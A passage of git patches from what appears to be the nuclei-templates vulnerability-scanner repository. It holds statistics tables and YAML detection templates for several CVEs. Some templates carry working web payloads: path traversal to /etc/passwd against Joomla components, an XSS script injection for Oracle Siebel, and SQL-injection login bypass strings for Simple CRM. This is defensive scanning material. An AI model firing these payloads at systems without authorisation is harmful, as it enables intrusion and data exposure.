alph4byt3 | 1 | | | | | | | -| sonicwall | 2 | 0h1in9e | 1 | | | | | | | -| prometheus | 2 | mohammedsaneem | 1 | | | | | | | -| intrusive | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| nextjs | 2 | zandros0 | 1 | | | | | | | -| smtp | 2 | fabaff | 1 | | | | | | | -| bigip | 2 | _harleo | 1 | | | | | | | -| natshell | 2 | ooooooo_q | 1 | | | | | | | -| spark | 2 | noamrathaus | 1 | | | | | | | -| icewarp | 2 | hakluke | 1 | | | | | | | -| ecology | 2 | willd96 | 1 | | | | | | | -| voipmonitor | 2 | omarkurt | 1 | | | | | | | -| openam | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| fortios | 2 | ajaysenr | 1 | | | | | | | -| maian | 2 | yashanand155 | 1 | | | | | | | -| rockethchat | 2 | tirtha_mandal | 1 | | | | | | | -| mail | 2 | sullo | 1 | | | | | | | -| zabbix | 2 | micha3lb3n | 1 | | | | | | | -| rockmongo | 2 | mhdsamx | 1 | | | | | | | -| exposures | 2 | juicypotato1 | 1 | | | | | | | -| plesk | 2 | thevillagehacker | 1 | | | | | | | -| nexus | 2 | bjhulst | 1 | | | | | | | -| keycloak | 2 | ipanda | 1 | | | | | | | -| emerge | 2 | w4cky_ | 1 | | | | | | | -| seeyon | 2 | kabirsuda | 1 | | | | | | | -| activemq | 2 | toufik airane | 1 | | | | | | | -| xxljob | 2 | ahmed sherif | 1 | | | | | | | -| globalprotect | 2 | j33n1k4 | 1 | | | | | | | -| huawei | 2 | gboddin | 1 | | | | | | | -| frp | 2 | ilovebinbash | 1 | | | | | | | -| splunk | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| trixbox | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| strapi | 2 | soyelmago | 1 | | | | | | | -| azure | 1 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| ssl | 1 | its0x08 | 1 | | | | | | | -| xiuno | 1 | becivells | 1 | | | | | | | -| enumeration | 1 | geraldino2 | 1 | | | | | | | -| javamelody | 1 | pudsec | 1 | | | | | | | -| nuuo | 1 | daviey | 1 | | | | | | | -| hadoop | 1 | berkdusunur | 1 | | | | | | | -| lanproxy | 1 | ohlinge | 1 | | | | | | | -| bullwark | 1 | bad5ect0r | 1 | | | | | | | -| itop | 1 | regala_ | 1 | | | | | | | -| nsasg | 1 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| rsyncd | 1 | rojanrijal | 1 | | | | | | | -| primetek | 1 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| gateone | 1 | bing0o | 1 | | | | | | | -| alerta | 1 | shelld3v | 1 | | | | | | | -| 74cms | 1 | zhenwarx | 1 | | | | | | | -| metinfo | 1 | _darrenmartyn | 1 | | | | | | | -| huijietong | 1 | johnk3r | 1 | | | | | | | -| xff | 1 | taielab | 1 | | | | | | | -| st | 1 | cookiehanhoan | 1 | | | | | | | -| webmin | 1 | 0xtavian | 1 | | | | | | | -| postmessage | 1 | sicksec | 1 | | | | | | | -| parentlink | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| targa | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | \ No newline at end of file +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----|-------|--------|-------|-----------|-------|----------|-------|------|-------| diff --git a/TOP-10.md b/TOP-10.md index 8f5b14bdca..7e09824ddd 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,2 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | -| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | -| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | -| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | -| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | -| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----|-------|--------|-------|-----------|-------|----------|-------|------|-------| From 2c3bb5055ad2558eee562d7d79fa62079b1646d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 26 Jul 2021 17:51:24 +0000 Subject: [PATCH 1165/4083] Auto Update README [Mon Jul 26 17:51:24 UTC 2021] :robot: --- README.md | 16 +++------------- 1 file changed, 3 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 1c9fb3a946..40c43fcb8c 100644 --- a/README.md +++ b/README.md @@ -40,20 +40,10 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | -| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | -| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | -| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | -| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | -| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----|-------|--------|-------|-----------|-------|----------|-------|------|-------| -**134 directories, 1612 files**. +**138 directories, 1709 files**.

    UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')
    ([0-9.]+)' From b15ed3324cd7dfc70ee5b0f9ccb3f3e77be378a1 Mon Sep 17 00:00:00 2001 From: pajoda Date: Sat, 14 Aug 2021 19:18:15 +0000 Subject: [PATCH 1642/4083] Include path for unpatched old versions --- cves/2021/CVE-2021-37704.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index 8bb90f41d9..4261ae4104 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -14,6 +14,7 @@ requests: - method: GET path: - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" + - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" matchers-condition: and matchers: From e9e84a4b36af830618159bdbd8fc2d9d2248dab3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 15 Aug 2021 00:57:33 +0530 Subject: [PATCH 1643/4083] minor update --- cves/2021/CVE-2021-37704.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index 4261ae4104..124362cab5 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -1,11 +1,11 @@ id: CVE-2021-37704 info: - name: phpinfo() exposure (CVE-2021-37704) + name: phpfastcache phpinfo exposure author: whoever severity: low description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. - tags: cve,composer,phpinfo + tags: cve,cve2021,exposure,phpfastcache reference: | https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 From 31d9d134d0bf6e5946a4ccbae382d4d25f1ae5e2 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 15 Aug 2021 05:21:30 +0700 Subject: [PATCH 1644/4083] Add Cisco Smart Install Endpoints Detect --- network/cisco-smi-detect.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 network/cisco-smi-detect.yaml diff --git a/network/cisco-smi-detect.yaml b/network/cisco-smi-detect.yaml new file mode 100644 index 0000000000..1c81ee8491 --- /dev/null +++ b/network/cisco-smi-detect.yaml @@ -0,0 +1,32 @@ +id: cisco-smi-detect + +info: + name: Cisco Smart Install Endpoints Detect + author: dwisiswant0 + severity: info + references: | + - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html + - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature + - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi + - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 + - https://github.com/Sab0tag3d/SIET + description: | + This template attempts to connect to the specified Cisco Smart Install port + and determines if it speaks the Smart Install Protocol. Exposure of SMI + to untrusted networks can allow complete compromise of the switch. + tags: network,cisco,smi,endpoint,exposure + +network: + - inputs: + - data: "000000010000000100000004000000080000000100000000" + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:4786" + + matchers: + - type: word + encoding: hex + words: + - "000000040000000000000003000000080000000100000000" From 1c2c5e6e69b4b12b4e29308ab372c1a28c2042f7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 15 Aug 2021 06:18:04 +0700 Subject: [PATCH 1645/4083] Create CVE-2010-1474.yaml --- cves/2010/CVE-2010-1474.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1474.yaml diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml new file mode 100644 index 0000000000..35d77a623f --- /dev/null +++ b/cves/2010/CVE-2010-1474.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1474 + +info: + name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12182 + - https://www.cvedetails.com/cve/CVE-2010-1474 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 7a58d43dbba8b126f17e8f44635807a881e2cd80 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 15 Aug 2021 06:25:02 +0700 Subject: [PATCH 1646/4083] Create CVE-2010-1602.yaml --- cves/2010/CVE-2010-1602.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1602.yaml diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml new file mode 100644 index 0000000000..082c4dab57 --- /dev/null +++ b/cves/2010/CVE-2010-1602.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1602 + +info: + name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12283 + - https://www.cvedetails.com/cve/CVE-2010-1602 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From cceb32a88b08a98a40b3b9c3aa774365ea50ae2c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 15 Aug 2021 23:18:13 +0530 Subject: [PATCH 1647/4083] Create oracle-siebel-xss.yaml --- vulnerabilities/oracle/oracle-siebel-xss.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/oracle/oracle-siebel-xss.yaml diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml new file mode 100644 index 0000000000..e3a186b898 --- /dev/null +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -0,0 +1,22 @@ +id: oracle-siebel-xss + +info: + name: Oracle Siebel XSS + author: dhiyaneshDK + severity: medium + reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + tags: xss + +requests: + - method: GET + path: + - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - 'XSS' + - type: status + status: + - 200 From 9fb1b464b4a08da522f42fc5fcecb3005d514813 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 15 Aug 2021 15:23:38 -0500 Subject: [PATCH 1648/4083] Create simple-crm-sql-injection.yaml --- .../simplecrm/simple-crm-sql-injection.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/simplecrm/simple-crm-sql-injection.yaml diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml new file mode 100644 index 0000000000..fe15fb2494 --- /dev/null +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -0,0 +1,33 @@ +id: simple-crm-sql-injection + +info: + name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass + reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + author: geeknik + severity: critical + tags: sqli,bypass,simplecrm + +requests: + - method: POST + path: + - "{{BaseURL}}/scrm/crm/admin" + body: "email='+or+2>1+--+&password=&login=" + + - method: POST + path: + - "{{BaseURL}}/crm/admin" + body: "email='+or+2>1+--+&password=&login=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header From cacb2ff68473425526ce10afcd78aa6f4a30e803 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 15 Aug 2021 15:28:00 -0500 Subject: [PATCH 1649/4083] Update simple-crm-sql-injection.yaml --- vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index fe15fb2494..a0924f1199 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -1,9 +1,9 @@ id: simple-crm-sql-injection info: - name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass + name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt - author: geeknik + author: geeknik severity: critical tags: sqli,bypass,simplecrm From 63dcc9dd49360836b1551d92653a593fa3050c7c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:23:06 +0700 Subject: [PATCH 1650/4083] Create CVE-2008-6172.yaml --- cves/2008/CVE-2008-6172.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2008/CVE-2008-6172.yaml diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml new file mode 100644 index 0000000000..b0554f0fe8 --- /dev/null +++ b/cves/2008/CVE-2008-6172.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6172 + +info: + name: Joomla! Component RWCards 3.0.11 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute 